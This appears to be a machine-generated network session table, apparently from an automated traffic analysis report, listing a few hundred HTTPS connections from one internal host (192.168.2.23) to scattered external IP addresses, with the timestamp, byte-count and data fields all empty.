                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25068192.168.2.2358950155.59.247.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25069192.168.2.2357494108.35.181.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25070192.168.2.233748469.13.239.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25071192.168.2.2348024186.185.235.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25072192.168.2.2342452201.155.28.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25073192.168.2.2340672184.200.27.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25074192.168.2.233673651.227.126.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25075192.168.2.2360632159.111.136.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25076192.168.2.2337372168.113.24.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25077192.168.2.2349572132.68.189.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25078192.168.2.2349796172.127.181.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25079192.168.2.2348576106.51.38.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25080192.168.2.235488423.81.165.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25081192.168.2.233465277.8.169.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25082192.168.2.2353040143.8.113.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25083192.168.2.2360226191.7.58.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25084192.168.2.235813039.26.63.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25085192.168.2.235703274.221.102.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25086192.168.2.235965250.152.169.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25087192.168.2.235333051.89.143.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25088192.168.2.2342434186.64.238.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25089192.168.2.2348326176.209.227.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25090192.168.2.2338364101.149.54.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25091192.168.2.2345672204.18.58.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25092192.168.2.2339910158.35.86.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25093192.168.2.23491085.171.5.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25094192.168.2.2359668136.0.20.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25095192.168.2.234219677.88.219.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25096192.168.2.233963469.52.10.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25097192.168.2.234895243.229.137.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25098192.168.2.2333674149.10.124.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25099192.168.2.234612014.151.57.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25100192.168.2.2333520154.248.78.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25101192.168.2.2348226220.154.152.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25102192.168.2.2355976116.81.91.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25103192.168.2.2345868221.11.217.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25104192.168.2.2359844129.250.28.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25105192.168.2.2347940167.240.26.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25106192.168.2.2336408213.192.96.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25107192.168.2.2338396218.176.182.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25108192.168.2.235385486.122.107.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25109192.168.2.2344200126.124.21.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25110192.168.2.2333684183.178.232.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25111192.168.2.234721272.96.42.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25112192.168.2.234471477.217.52.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25113192.168.2.233295248.154.66.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25114192.168.2.23407461.185.178.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25115192.168.2.2359434193.253.115.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25116192.168.2.2357668162.105.31.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25117192.168.2.2357210220.1.230.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25118192.168.2.234502257.57.207.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25119192.168.2.2356444137.237.229.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25120192.168.2.2356808105.144.166.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25121192.168.2.2333112103.27.1.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25122192.168.2.2339420146.110.176.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25123192.168.2.233621035.87.101.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25124192.168.2.2340112181.95.226.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25125192.168.2.2348038156.114.85.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25126192.168.2.233602284.97.16.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25127192.168.2.2353306200.81.237.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25128192.168.2.2336422135.250.237.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25129192.168.2.233812218.3.100.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25130192.168.2.234620469.8.76.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25131192.168.2.2355116211.218.220.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25132192.168.2.235967678.26.234.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25133192.168.2.234438284.41.3.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25134192.168.2.233374667.117.8.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25135192.168.2.23454225.180.202.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25136192.168.2.233895619.69.155.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25137192.168.2.234077669.9.101.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25138192.168.2.2352256211.221.8.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25139192.168.2.236050452.232.114.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25140192.168.2.2359268129.10.213.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25141192.168.2.234048649.14.105.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25142192.168.2.233802825.117.211.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25143192.168.2.2352752222.108.161.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25144192.168.2.2341180195.253.177.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25145192.168.2.2338418162.195.61.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25146192.168.2.234687858.190.106.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25147192.168.2.233777673.47.136.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25148192.168.2.2342648184.237.216.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25149192.168.2.2339456162.128.158.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25150192.168.2.234201023.175.173.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25151192.168.2.2343990148.212.91.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25152192.168.2.235290224.20.149.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25153192.168.2.2345796155.102.60.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25154192.168.2.2349280157.245.5.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25155192.168.2.2336908169.252.133.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25156192.168.2.2352922121.152.84.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25157192.168.2.235999072.169.176.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25158192.168.2.2350038166.6.176.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25159192.168.2.234597846.171.87.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25160192.168.2.233420457.45.191.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25161192.168.2.2352872146.128.236.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25162192.168.2.2345316221.58.90.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25163192.168.2.2358006183.132.203.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25164192.168.2.234005044.113.184.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25165192.168.2.2352150205.216.232.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25166192.168.2.235986078.14.149.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25167192.168.2.234841865.47.244.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25168192.168.2.2347716157.123.223.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25169192.168.2.234939244.11.254.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25170192.168.2.2342260111.26.146.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25171192.168.2.2351322216.210.231.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25172192.168.2.2358440194.233.31.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25173192.168.2.234492217.245.105.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25174192.168.2.2360524173.240.220.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25175192.168.2.235269879.134.52.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25176192.168.2.235107417.5.97.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25177192.168.2.235570863.75.115.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25178192.168.2.2342302142.240.80.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25179192.168.2.2357538106.143.249.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25180192.168.2.2354838130.157.235.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25181192.168.2.2346254113.223.169.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25182192.168.2.235188463.200.212.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25183192.168.2.2354002157.44.182.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25184192.168.2.235999250.104.33.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25185192.168.2.2336102204.84.106.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25186192.168.2.2339140190.233.115.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25187192.168.2.233946491.236.192.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25188192.168.2.2356566136.167.252.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25189192.168.2.2337110155.154.202.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25190192.168.2.2349204124.144.20.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25191192.168.2.234253447.129.197.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25192192.168.2.235171274.237.139.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25193192.168.2.234420840.139.188.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25194192.168.2.2339662162.58.103.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25195192.168.2.2340314195.187.122.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25196192.168.2.23423405.139.151.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25197192.168.2.234953019.155.171.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25198192.168.2.2340970202.85.71.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25199192.168.2.2356456156.204.161.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25200192.168.2.2356974129.138.87.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25201192.168.2.233613294.141.81.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25202192.168.2.235369072.95.48.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25203192.168.2.235862266.176.177.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25204192.168.2.235453850.178.47.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25205192.168.2.233324842.10.143.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25206192.168.2.2345298223.99.67.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25207192.168.2.23451289.192.14.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25208192.168.2.2346276166.218.67.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25209192.168.2.235704819.66.90.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25210192.168.2.235960265.255.136.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25211192.168.2.2338246164.225.252.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25212192.168.2.233896239.135.130.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25213192.168.2.233846283.92.200.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25214192.168.2.235167072.165.133.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25215192.168.2.235521464.133.163.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25216192.168.2.236090873.81.167.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25217192.168.2.233680842.26.13.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25218192.168.2.2349148156.216.134.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25219192.168.2.233827684.225.32.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25220192.168.2.233593684.237.0.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25221192.168.2.235148860.146.66.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25222192.168.2.23399764.110.148.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25223192.168.2.2343476169.213.165.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25224192.168.2.2343644200.228.19.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25225192.168.2.2336756119.66.255.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25226192.168.2.2359220195.79.175.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25227192.168.2.2332910172.80.241.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25228192.168.2.2351848133.208.63.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25229192.168.2.235696472.40.80.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25230192.168.2.2339760196.118.10.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25231192.168.2.2341338195.174.222.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25232192.168.2.2333058142.247.61.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25233192.168.2.2356134133.249.176.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25234192.168.2.233872683.80.200.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25235192.168.2.23344188.35.14.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25236192.168.2.233944864.105.104.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25237192.168.2.2335542134.209.188.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25238192.168.2.2349338182.216.59.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25239192.168.2.2348198168.48.135.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25240192.168.2.235964882.87.184.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25241192.168.2.2346096204.228.0.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25242192.168.2.2334618168.37.21.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25243192.168.2.234240471.64.232.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25244192.168.2.233459653.106.167.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25245192.168.2.2333402192.69.63.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25246192.168.2.234011637.214.138.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25247192.168.2.233341099.227.232.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25248192.168.2.234775867.219.152.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25249192.168.2.2345708164.99.182.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25250192.168.2.2338550200.52.186.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25251192.168.2.2353474149.244.195.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25252192.168.2.2360810143.50.52.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25253192.168.2.2346686170.113.155.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25254192.168.2.2336430134.66.190.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25255192.168.2.2358842132.204.206.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25256192.168.2.234496854.171.244.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25257192.168.2.2342120110.159.102.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25258192.168.2.2348818145.181.62.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25259192.168.2.233613494.120.1.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25260192.168.2.234692289.146.83.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25261192.168.2.2349122218.195.71.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25262192.168.2.2352626149.186.245.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25263192.168.2.2333840104.31.96.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25264192.168.2.234286217.238.10.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25265192.168.2.234324292.254.105.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25266192.168.2.233442018.206.242.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25267192.168.2.235157494.40.29.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25268192.168.2.2351716186.203.111.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25269192.168.2.233999045.89.49.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25270192.168.2.2353954188.227.220.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25271192.168.2.2348134101.190.142.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25272192.168.2.2339792199.34.30.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25273192.168.2.235197492.240.62.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25274192.168.2.235841676.168.254.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25275192.168.2.2337140145.80.180.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25276192.168.2.2343692193.16.251.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25277192.168.2.2348052223.51.52.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25278192.168.2.234105442.43.9.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25279192.168.2.2337778117.228.24.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25280192.168.2.2340124181.22.171.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25281192.168.2.23531581.144.175.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25282192.168.2.2340298164.118.118.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25283192.168.2.2348152149.24.81.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25284192.168.2.234466837.100.180.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25285192.168.2.2353838139.5.73.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25286192.168.2.233797281.150.139.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25287192.168.2.2356546169.35.96.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25288192.168.2.2353830115.231.9.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25289192.168.2.235708848.4.89.147443
                                          TimestampBytes transferredDirectionData


